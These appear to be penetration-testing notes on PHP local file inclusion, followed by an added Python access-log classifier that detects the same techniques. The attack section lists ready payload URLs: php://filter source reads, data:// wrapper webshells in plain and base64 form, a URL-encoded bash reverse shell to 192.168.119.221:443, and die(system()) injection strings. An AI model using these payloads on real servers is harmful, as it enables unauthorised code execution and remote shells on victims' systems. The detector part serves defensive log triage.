File inclusion Vuln
Checking LFI on a Windows server
Instead of /etc/passwd, use C:/Windows/System32/drivers/etc/hosts
PHP Wrappers
PHP provides several protocol wrappers that we can use to exploit directory traversal and local file inclusion vulnerabilities. These filters give us additional flexibility when attempting to inject PHP code via LFI vulnerabilities. We can use the data wrapper to embed inline data as part of the URL with plaintext or base64 encoded data. This wrapper provides us with an alternative payload when we cannot poison a local file with PHP code. The data wrapper is only honoured by include when allow_url_include is enabled in php.ini; it is off by default, and leaving it off blocks the data: payloads below.
- filter: to check the source code of executable files
  - http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=<file>
  - http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php
  - then decode the output via echo "<output>" | base64 -d
- data:
  - http://<vul-web>/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
  - If there is any restriction, it can be bypassed by encoding:
    - echo -n '<?php echo system($_GET["cmd"]);?>' | base64
    - PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==
    - http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls
  - Reverse shell
    - http://<ip>/section.php?page=data:text/plain,<?php echo shell_exec('bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.221%2F443%200%3E%261');?>
LFI through an alternate way
If ../../../etc/passwd doesn't work, then try:
- ' and die(show_source('/etc/passwd')) or '
- To run a command, use system:
  - ' and die(system("<command>")) or '
https://h0j3n.medium.com/vulnhub-assertion-1-0-1-eb78a0cb9216
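
On the detection side, the wrapper and alternate-injection requests noted above leave recognisable traces in web-server access logs. The Python classifier below is an added example, not part of the original notes; the rule names, the `classify` function and the sample request targets are constructed for illustration.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

# Rules mirror the techniques in these notes; a starting point, not a full rule set.
RULES = [
    ("php-filter-wrapper", re.compile(r"php://filter", re.I)),
    ("data-wrapper", re.compile(r"^\s*data:(//)?\w+/", re.I)),
    ("path-traversal", re.compile(r"\.\.[/\\]")),
    ("sensitive-file", re.compile(r"/etc/passwd|drivers[/\\]etc[/\\]hosts", re.I)),
    ("assert-injection", re.compile(r"'\s*and\s+die\s*\(", re.I)),
]
B64_DATA = re.compile(r"^data:(?://)?[^,]*;base64,(.+)$", re.I | re.S)

def fully_unquote(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (double-encoding evasion)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return the sorted names of the rules matched by any query parameter."""
    hits = set()
    for pair in urlsplit(target).query.split("&"):
        value = fully_unquote(pair.partition("=")[2])
        text = value.replace("+", " ")  # form-encoded spaces
        hits.update(name for name, rx in RULES if rx.search(text))
        m = B64_DATA.match(value)
        if m:
            try:  # the extra "===" tolerates stripped padding
                payload = base64.b64decode(m.group(1) + "===").decode("latin-1")
            except ValueError:
                payload = ""
            if "<?" in payload:
                hits.add("php-code-in-data-uri")
        elif "<?" in value:
            hits.add("php-code-in-parameter")
    return sorted(hits)

if __name__ == "__main__":
    # Constructed request targets (not real log data), with a harmless payload.
    b64 = base64.b64encode(b"<?php echo 1; ?>").decode()
    for t in ("/index.php?page=about.php",
              "/index.php?page=php://filter/convert.base64-encode/resource=admin.php",
              "/index.php?page=data://text/plain;base64," + b64,
              "/index.php?page=..%252f..%252f..%252fetc%252fpasswd"):
        print(classify(t), t)
```

Feed it the request target field of each access-log line. Any hit on a parameter that ends up in an include() or assert() call is worth triage.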